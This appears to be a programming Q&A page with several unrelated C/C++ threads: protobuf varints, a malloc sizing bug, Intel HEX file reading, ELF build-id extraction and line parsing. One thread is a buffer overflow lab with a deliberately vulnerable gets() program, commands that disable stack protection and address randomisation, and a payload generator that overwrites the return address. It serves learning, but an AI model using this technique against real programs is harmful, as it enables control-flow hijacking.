Varint for protobuf encoding: not the expected value

I'm using the Google Protocol Buffers library:
$protoc --version
libprotoc 2.5.0
I searched the internet, and it says the encoding of an integer consists of multiple bytes, where the first (most significant) bit of each byte indicates whether the encoding continues into another byte. My understanding:
For the number 101 (0x65), which fits in one byte, the encoded value is still 0x65.
For the number 0x6565, since it takes 2 bytes and Intel is little-endian, the first byte should have its most significant bit set to 1, so 0x65 + 0x80 = 0xe5, and the whole integer should still be 2 bytes, encoded as
0xe5 0x65
That was my expectation, but I tested it with sample programs. First I wrote the value 0x65 to log7.data and the value 0x6565 to log8.data, then used the xxd command to check them:
$cat 7.proto
message hello
{
required int32 f1=1;
}
$cat 7.cpp
#include "7.pb.h"
#include<fstream>
using namespace std;
int main()
{
fstream f("./log7.data",ios::binary|ios::out);
hello p;
p.set_f1(0x65);
p.SerializeToOstream(&f);
return 0;
}
$cat 8.cpp
#include ".pb.h"
#include<fstream>
using namespace std;
int main()
{
fstream f("./log8.data",ios::binary|ios::out);
hello p;
p.set_f1(0x6565);
p.SerializeToOstream(&f);
return 0;
}
Check the output:
$protoc 7.proto --cpp_out=./
$g++ 7.cpp 7.pb.cc -lprotobuf && ./a.out && xxd log7.data
00000000: 0865 .e
$protoc 8.proto --cpp_out=./
$g++ 8.cpp 8.pb.cc -lprotobuf && ./a.out && xxd log8.data
00000000: 08e5 ca01 ....
You can see that for log8.data I expected "08e5 65", but it's actually "08e5 ca01". How can this value be explained?
Thanks.

You need to split the value into 7-bit groups and set the continuation bit (the most significant bit) on every byte except the last one emitted:
0x6565 => to binary
0b110010101100101 => split into 7-bit groups
0b1 1001010 1100101 => prepend a 1 bit to every group except the first (most significant) one
0b1 11001010 11100101 => now show in hex
0x01cae5
The groups are written to the wire least significant first, which is why the file contains e5 ca 01.
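For reference, here is a minimal sketch of that base-128 varint encoding, written as a standalone C++ illustration rather than the protobuf library's own code. The leading 0x08 byte in the dumps is the field tag (field number 1, wire type 0), which precedes the varint value.

#include <cstdint>
#include <cstdio>
#include <vector>

// Encode an unsigned value as a base-128 varint: emit the low 7 bits of the
// value in each byte, least-significant group first, and set the high bit
// (the continuation bit) on every byte except the last.
std::vector<uint8_t> encode_varint(uint64_t value)
{
    std::vector<uint8_t> out;
    do {
        uint8_t byte = value & 0x7f;   // low 7 bits of the remaining value
        value >>= 7;
        if (value != 0)
            byte |= 0x80;              // more bytes follow
        out.push_back(byte);
    } while (value != 0);
    return out;
}

int main()
{
    for (uint8_t b : encode_varint(0x6565))
        printf("%02x ", b);            // prints: e5 ca 01
    printf("\n");
    return 0;
}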

Related

C Function to return a String resulting in corrupted top size

I am trying to write a program that calls upon an [external library (?)] (I'm not sure that I'm using the right terminology here) that I am also writing to clean up a provided string. For example, if my main.c program were to be provided with a string such as:
asdfFAweWFwseFL Wefawf JAWEFfja FAWSEF
it would call upon a function in externalLibrary.c (let's call it externalLibrary_Clean for now) that would take in the string and return all characters in upper case without spaces:
ASDFFAWEWFWSEFLWEFAWFJAWEFFJAFAWSEF
The crazy part is that I have this working... so long as my string doesn't exceed 26 characters in length. As soon as I add a 27th character, I end up with an error that says
malloc(): corrupted top size.
Here is externalLibrary.c:
#include "externalLibrary.h"
#include <ctype.h>
#include <malloc.h>
#include <assert.h>
#include <string.h>
char * restrict externalLibrary_Clean(const char* restrict input) {
    // first we define the return value as a pointer and initialize
    // an integer to count the length of the string
    char * returnVal = malloc(sizeof(input));
    char * initialReturnVal = returnVal; //point to the start location
    // until we hit the end of the string, we use this while loop to
    // iterate through it
    while (*input != '\0') {
        if (isalpha(*input)) { // if we encounter an alphabet character (a-z/A-Z)
            // then we convert it to an uppercase value and point our return value at it
            *returnVal = toupper(*input);
            returnVal++; //we use this to move our return value to the next location in memory
        }
        input++; // we move to the next memory location on the provided character pointer
    }
    *returnVal = '\0'; //once we have exhausted the input character pointer, we terminate our return value
    return initialReturnVal;
}

int * restrict externalLibrary_getFrequencies(char * ar, int length){
    static int freq[26];
    for (int i = 0; i < length; i++){
        freq[(ar[i]-65)]++;
    }
    return freq;
}
the header file for it (externalLibrary.h):
#ifndef LEARNINGC_EXTERNALLIBRARY_H
#define LEARNINGC_EXTERNALLIBRARY_H
#ifdef __cplusplus
extern "C" {
#endif
char * restrict externalLibrary_Clean(const char* restrict input);
int * restrict externalLibrary_getFrequencies(char * ar, int length);
#ifdef __cplusplus
}
#endif
#endif //LEARNINGC_EXTERNALLIBRARY_H
my main.c file from where all the action is happening:
#include <stdio.h>
#include "externalLibrary.h"
int main() {
    char * unfilteredString = "ASDFOIWEGOASDGLKASJGISUAAAA"; //if this exceeds 26 characters, the program breaks
    char * cleanString = externalLibrary_Clean(unfilteredString);
    //int * charDist = externalLibrary_getFrequencies(cleanString, 25); //this works just fine... for now

    printf("\nOutput: %s\n", unfilteredString);
    printf("\nCleaned Output: %s\n", cleanString);

    /*for(int i = 0; i < 26; i++){
        if(charDist[i] == 0){
        }
        else {
            printf("%c: %d \n", (i + 65), charDist[i]);
        }
    }*/
    return 0;
}
I'm extremely well versed in Java programming and I'm trying to translate my knowledge over to C as I wish to learn how my computer works in more detail (and have finer control over things such as memory).
If I were solving this problem in Java, it would be as simple as creating two class files: one called main.java and one called externalLibrary.java, where I would have static String Clean(string input) and then call upon it in main.java with String cleanString = externalLibrary.Clean(unfilteredString).
Clearly this isn't how C works, but I want to learn how it does work (and why my code is crashing with "corrupted top size").
The bug is this line:
char * returnVal = malloc(sizeof(input));
The reason it is a bug is that it requests an allocation only large enough to store a pointer, i.e. 8 bytes in a 64-bit program. What you want is to allocate enough space to store the modified string, which you can do with the following line:
char *returnVal = malloc(strlen(input) + 1);
So the other part of your question is why the program doesn't crash when your string is less than 26 characters. The reason is that malloc is allowed to give the caller slightly more than the caller requested.
In your case, the message "malloc(): corrupted top size" suggests that you are using glibc malloc, which is the default on Linux. That variant of malloc, in a 64-bit process, will always give you at least 0x18 (24) usable bytes (the minimum chunk size of 0x20 minus 8 bytes for the size/status word). In the specific case that the allocation immediately precedes the "top" chunk, writing past the end of the allocation will clobber the "top" size.
If your string is longer than 23 (0x17) characters, you will start to clobber the size/status of the subsequent allocation, because you also need 1 byte to store the trailing null terminator. Any string of 23 characters or fewer will not cause a problem.
As to why you didn't get an error with a 26-character string, one would have to see the exact program and the exact 26-character input that does not crash to give a precise answer. For example, if that input contained 3 blanks, the result would require only 26 + 1 - 3 = 24 bytes, which would fit in the allocation.
If you are not interested in that level of detail, fixing the malloc call to request the proper amount will fix your crash.
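For completeness, here is a minimal corrected sketch of the cleaning function. The only substantive change from the original is the allocation size; the restrict qualifiers are dropped and the malloc result is cast so the same code also compiles as C++.

#include <ctype.h>
#include <stdlib.h>
#include <string.h>

char *externalLibrary_Clean(const char *input) {
    // Allocate room for the worst case: every input character kept, plus
    // the terminating '\0'. sizeof(input) would only be the pointer size.
    char *returnVal = (char *)malloc(strlen(input) + 1);
    char *out = returnVal;

    while (*input != '\0') {
        if (isalpha((unsigned char)*input))
            *out++ = toupper((unsigned char)*input);
        input++;
    }
    *out = '\0';
    return returnVal;   // caller is responsible for free()ing this
}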

Printing Lines from Intel HEX Record File

I'm trying to send the contents of an Intel Hex file over a Serial connection to a microcontroller, which will process each line sent and program them into memory as needed. The processing code expects the lines to be sent as they appear in the Hex file, including the newline characters at the end of each line.
This code is being run in Visual Studio 2013 on a Windows 10 PC; for reference, the microcontroller is an ARM Cortex-M0+ model.
However, the following code doesn't seem to be processing the Intel Hex record file the way that I expected.
...
int count = 0;
char hexchar;
unsigned char Buffer[69]; // 69 is max ascii hex read length for microcontroller
ifstream hexfile("pdu.hex");
while (hexfile.get(hexchar))
{
    Buffer[count] = hexchar;
    count++;
    if (hexchar == '\n')
    {
        for (int i = 0; i < count; i++)
        {
            printf("%c", Buffer[i]);
        }
        serial_tx_function(Buffer); // microcontroller requires unsigned char
        count = 0;
    }
}
...
Currently, the serial transmission call is commented out, and the for loop is there to verify that the file is being read properly. I expect to see each line of the hex file printed out to the terminal. Instead, I get nothing at all. Any ideas?
EDIT: After further investigation, I determined that the program isn't even entering the while loop because the file fails to open. I don't know why that would be the case, since the file exists and can be opened in other programs like Notepad. However, I'm not terribly experienced with file I/O, so I might be overlooking something.
*.hex files often contain non-ASCII data that can have issues being printed on command-line terminals.
I would suggest opening the file as binary and printing the characters as hexadecimal numbers.
So make sure you open the file in binary mode with ifstream hexfile("pdu.hex", ifstream::binary); and if you want to print the characters as hex, the printf specifier is %x (or %hhx for a char).
The whole program would look something like this:
#include <iostream>
#include <fstream>
#include <cstdio>
#include <cassert>

int main()
{
    using namespace std;

    int count = 0;
    char hexchar;
    constexpr int MAX_LINE_LENGTH = 69;
    unsigned char Buffer[MAX_LINE_LENGTH]; // 69 is max ascii hex read length for microcontroller
    ifstream hexfile("pdu.hex", ios::binary);
    while (hexfile.get(hexchar))
    {
        assert(count < MAX_LINE_LENGTH);
        Buffer[count] = hexchar;
        count++;
        if (hexchar == '\n')
        {
            for (int i = 0; i < count; i++)
            {
                printf("%hhx ", Buffer[i]);
            }
            printf("\n");
            //serial_tx_function(Buffer); // microcontroller requires unsigned char
            count = 0;
        }
    }
}

Writing a buffer overflow exploit

I understand there are quite a few tutorials on how to write a buffer overflow, but I still can't write my own.
The following is the C code I want to hack:
#include <stdio.h>
#include <stdlib.h>

static int x = 8;

void prompt(){
    char buf[100];
    gets(buf);
    printf("You entered: %s\n", buf);
}

int main(){
    prompt();
    return 0;
}

void target(){
    printf("Haha! I made it!\n");
    exit(0);
}
My goal is to execute the target() function via a buffer overflow exploit.
Through trial and error, I've discovered that the minimum number of characters required to obtain a segmentation fault is 108 (therefore 107 characters does NOT cause a seg fault).
I've disassembled the binary and found the target function to be at address 0x08048e7f.
I've flipped the byte order to compensate for endianness --> 0x7f8e0408
I then converted that hexadecimal to binary, then to ASCII, obtaining: & # 3 8 1 ; (ignore the spaces; Stack Overflow doesn't show it properly otherwise)
Afterwards, I inserted the first 107 characters, and then Ž
Thus, my attack string is: iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiŽ
This still gives me a segmentation fault.
I've compiled like so:
gcc ./vuln_program.c -fno-stack-protector -z execstack -static -o vuln_program
and have disabled protections beforehand like so:
sudo sysctl -w kernel.randomize_va_space=0
I am using a 32 bit Ubuntu virtual machine.
Any ideas?
Thank you.
EDIT:
I just realized that my output on this site is being read as weird characters.
If you see a weird Ž, it really is the characters 1) & 2) # 3) 3 4) 8 5) 1 6) ; in that exact order (i.e. the HTML entity &#381;).
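As an illustration of the approach described above (a sketch, not a verified solution): the return address needs to go into the input as raw bytes, not as the printable characters of its hex digits, so it is usually easier to generate the payload with a small program and redirect the file into the target. The 108-byte padding and the address 0x08048e7f below are assumptions taken from the question; the exact offset of the saved return address has to be found by experiment against your own binary.

#include <cstdint>
#include <cstdio>

int main()
{
    const unsigned padding = 108;            // guess based on the question; adjust as needed
    const uint32_t target_addr = 0x08048e7f; // address of target() from the disassembly

    FILE *f = fopen("payload.bin", "wb");
    if (!f)
        return 1;
    for (unsigned i = 0; i < padding; ++i)
        fputc('i', f);                       // filler bytes
    // Emit the address least-significant byte first (little-endian x86),
    // i.e. the raw bytes 7f 8e 04 08.
    for (int shift = 0; shift < 32; shift += 8)
        fputc((target_addr >> shift) & 0xff, f);
    fclose(f);
    return 0;                                // then run: ./vuln_program < payload.bin
}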

Can a program read its own ELF section?

I would like to use ld's --build-id option in order to add build information to my binary. However, I'm not sure how to make this information available inside the program. Assume I want to write a program that writes a backtrace every time an exception occurs, and a script that parses this information. The script reads the symbol table of the program and searches for the addresses printed in the backtrace (I'm forced to use such a script because the program is statically linked and backtrace_symbols is not working). In order for the script to work correctly, I need to match the build version of the program with the build version of the program which created the backtrace. How can I print the build version of the program (located in the .note.gnu.build-id ELF section) from the program itself?
How can I print the build version of the program (located in the .note.gnu.build-id elf section) from the program itself?
You need to read the ElfW(Ehdr) (at the beginning of the file) to find program headers in your binary (.e_phoff and .e_phnum will tell you where program headers are, and how many of them to read).
You then read the program headers until you find the PT_NOTE segment of your program. That segment will tell you the offset to the beginning of all the notes in your binary.
You then need to read the ElfW(Nhdr) and skip the rest of the note (total size of the note is sizeof(Nhdr) + .n_namesz + .n_descsz, properly aligned), until you find a note with .n_type == NT_GNU_BUILD_ID.
Once you find NT_GNU_BUILD_ID note, skip past its .n_namesz, and read the .n_descsz bytes to read the actual build-id.
You can verify that you are reading the right data by comparing what you read with the output of readelf -n a.out.
P.S.
If you are going to go through the trouble to decode build-id as above, and if your executable is not stripped, it may be better for you to just decode and print symbol names instead (i.e. to replicate what backtrace_symbols does) -- it's actually easier to do than decoding ELF notes, because the symbol table contains fixed-sized entries.
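To illustrate that P.S. (this is only a sketch under assumptions, not code from the answer): for a non-stripped, non-PIE, 64-bit executable, such as the statically linked case described in the question, the symbol table can be read straight from the file via the section headers and a function name looked up from an address. print_symbol_for and some_function are made-up names used only for this example.

#include <elf.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <cstdio>

// Hypothetical function whose name we will look up from its address.
void some_function() {}

// Scan .symtab of the executable at exe_path for the function symbol whose
// range contains addr, and print its name. Assumes a 64-bit, non-stripped,
// non-PIE binary, so runtime addresses match the st_value fields.
static void print_symbol_for(const char *exe_path, Elf64_Addr addr)
{
    int fd = open(exe_path, O_RDONLY);
    if (fd < 0) { perror(exe_path); return; }
    struct stat st;
    if (fstat(fd, &st) < 0) { perror(exe_path); close(fd); return; }
    char *base = (char *)mmap(0, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);

    Elf64_Ehdr *ehdr = (Elf64_Ehdr *)base;
    Elf64_Shdr *shdr = (Elf64_Shdr *)(base + ehdr->e_shoff);

    for (int i = 0; i < ehdr->e_shnum; ++i) {
        if (shdr[i].sh_type != SHT_SYMTAB)
            continue;
        Elf64_Sym *syms = (Elf64_Sym *)(base + shdr[i].sh_offset);
        const char *strtab = base + shdr[shdr[i].sh_link].sh_offset; // linked string table
        size_t nsyms = shdr[i].sh_size / shdr[i].sh_entsize;

        for (size_t j = 0; j < nsyms; ++j) {
            if (ELF64_ST_TYPE(syms[j].st_info) == STT_FUNC &&
                addr >= syms[j].st_value &&
                addr <  syms[j].st_value + syms[j].st_size)
                printf("0x%lx is in %s\n", (unsigned long)addr,
                       strtab + syms[j].st_name);
        }
    }
    munmap(base, st.st_size);
    close(fd);
}

int main(int argc, char *argv[])
{
    (void)argc;
    print_symbol_for(argv[0], (Elf64_Addr)&some_function);
    return 0;
}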
Basically, this is the code I've written based on the answer given to my question. In order to compile the code I had to make some changes, and I hope it will work on as many platforms as possible; however, it was tested on only one build machine. One of the assumptions I used is that the program is built on the machine which runs it, so there is no point in checking endianness compatibility between the program and the machine.
user#:~/$ uname -s -r -m -o
Linux 3.2.0-45-generic x86_64 GNU/Linux
user#:~/$ g++ test.cpp -o test
user#:~/$ readelf -n test | grep Build
Build ID: dc5c4682e0282e2bd8bc2d3b61cfe35826aa34fc
user#:~/$ ./test
Build ID: dc5c4682e0282e2bd8bc2d3b61cfe35826aa34fc
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#if __x86_64__
# define ElfW(type) Elf64_##type
#else
# define ElfW(type) Elf32_##type
#endif
/*
detecting build id of a program from its note section
http://stackoverflow.com/questions/17637745/can-a-program-read-its-own-elf-section
http://www.scs.stanford.edu/histar/src/pkg/uclibc/utils/readelf.c
http://www.sco.com/developers/gabi/2000-07-17/ch5.pheader.html#note_section
*/
int main (int argc, char* argv[])
{
    char *thefilename = argv[0];
    FILE *thefile;
    struct stat statbuf;
    ElfW(Ehdr) *ehdr = 0;
    ElfW(Phdr) *phdr = 0;
    ElfW(Nhdr) *nhdr = 0;

    if (!(thefile = fopen(thefilename, "r"))) {
        perror(thefilename);
        exit(EXIT_FAILURE);
    }
    if (fstat(fileno(thefile), &statbuf) < 0) {
        perror(thefilename);
        exit(EXIT_FAILURE);
    }

    ehdr = (ElfW(Ehdr) *)mmap(0, statbuf.st_size,
        PROT_READ|PROT_WRITE, MAP_PRIVATE, fileno(thefile), 0);
    phdr = (ElfW(Phdr) *)(ehdr->e_phoff + (size_t)ehdr);
    while (phdr->p_type != PT_NOTE)
    {
        ++phdr;
    }
    nhdr = (ElfW(Nhdr) *)(phdr->p_offset + (size_t)ehdr);
    while (nhdr->n_type != NT_GNU_BUILD_ID)
    {
        nhdr = (ElfW(Nhdr) *)((size_t)nhdr + sizeof(ElfW(Nhdr)) + nhdr->n_namesz + nhdr->n_descsz);
    }

    unsigned char * build_id = (unsigned char *)malloc(nhdr->n_descsz);
    memcpy(build_id, (void *)((size_t)nhdr + sizeof(ElfW(Nhdr)) + nhdr->n_namesz), nhdr->n_descsz);

    printf(" Build ID: ");
    for (int i = 0 ; i < nhdr->n_descsz ; ++i)
    {
        printf("%02x", build_id[i]);
    }
    free(build_id);
    printf("\n");
    return 0;
}
Yes, a program can read its own .note.gnu.build-id. The important piece is the dl_iterate_phdr function.
I've used this technique in Mesa (the OpenGL/Vulkan implementation) to read its own build-id for use with the on-disk shader cache.
I've extracted those bits into a separate project[1] for easy use by others.
[1] https://github.com/mattst88/build-id
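For reference, a rough sketch of that dl_iterate_phdr approach (an illustration of the idea, not code taken from the linked project; it assumes the usual 4-byte alignment of GNU note entries):

#include <elf.h>
#include <link.h>
#include <cstdio>
#include <cstring>

// Called once per loaded object; info->dlpi_name is "" for the main program.
static int find_build_id(struct dl_phdr_info *info, size_t, void *)
{
    if (info->dlpi_name[0] != '\0')
        return 0;                       // skip shared libraries, keep iterating

    for (int i = 0; i < info->dlpi_phnum; ++i) {
        const ElfW(Phdr) *phdr = &info->dlpi_phdr[i];
        if (phdr->p_type != PT_NOTE)
            continue;

        const char *p   = (const char *)(info->dlpi_addr + phdr->p_vaddr);
        const char *end = p + phdr->p_memsz;
        while (p + sizeof(ElfW(Nhdr)) <= end) {
            const ElfW(Nhdr) *nhdr = (const ElfW(Nhdr) *)p;
            const char *name = p + sizeof(ElfW(Nhdr));
            const char *desc = name + ((nhdr->n_namesz + 3) & ~3u); // 4-byte aligned

            if (nhdr->n_type == NT_GNU_BUILD_ID &&
                nhdr->n_namesz == 4 && memcmp(name, "GNU", 4) == 0) {
                printf("Build ID: ");
                for (unsigned j = 0; j < nhdr->n_descsz; ++j)
                    printf("%02x", (unsigned char)desc[j]);
                printf("\n");
                return 1;               // non-zero stops the iteration
            }
            p = desc + ((nhdr->n_descsz + 3) & ~3u);
        }
    }
    return 0;
}

int main()
{
    dl_iterate_phdr(find_build_id, nullptr);
    return 0;
}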

Read line by line from text file c++

I have a file with random data for accounts.
The data in the file:
5
2871 2.19 8
1234 95.04 23
3341 0.00 10
3221 -1.08 21
7462 404.14 4
3425 4784.00 200
3701 99.50
JUNK SHOULD NEVER GET HERE
3333
The first number 5 will always be the number of accounts that need to be processed.
I want to be able to read that number and set it as the number of accounts.
So my question is: how can I read the file line by line and set the first number as the number of accounts that need to be processed?
Code so far:
#include <iostream>
#include <fstream>
#include <string>
using namespace std;
int main()
{
    double NumberOfAccounts;
    ifstream File("test.dat");
    string line;

    if(File)
    {
        while(getline(File,line))
        {
            NumberOfAccounts=line[0];
        }
        File.close();
    }

    cout<<NumberOfAccounts;
    system("pause");
    return 0;
}
Right now it just prints out 51.
Any tips/help would be appreciated.
Two things. One, you're getting stuck in the while loop (while there's a line left, read it in and re-assign the number of accounts) until the end of the file, so you end up with the last line rather than the first. Secondly, ASCII codes do not correspond to the digits' numeric values, so the character "0" is actually the number 48. You're getting 51 because the program reads the last line, finds the "3" character, assigns its character code (which is 51) to NumberOfAccounts, then outputs it.
NumberOfAccounts is a double, but you are assigning the first character of line to it...
I assume you meant the first line in the file.
My C++ is crap so
pseudocode
if (File)
{
    if (getline(File, line))
    {
        NumberOfAccounts = atof(line.c_str());
    }
    File.close();
}
cout << NumberOfAccounts;
system("pause");
return 0;
atof is one way to convert a string to a double. You don't need to read the entire file to get the first line.
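For reference, a minimal sketch in more idiomatic C++: read only the first line and convert it with std::stoi (the file name test.dat is the one from the question).

#include <fstream>
#include <iostream>
#include <string>

int main()
{
    std::ifstream file("test.dat");
    std::string line;
    int numberOfAccounts = 0;

    // The first line holds the number of accounts, so read just that line
    // and convert it; there is no need to loop over the rest of the file.
    if (std::getline(file, line))
        numberOfAccounts = std::stoi(line);

    std::cout << numberOfAccounts << "\n";
    return 0;
}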
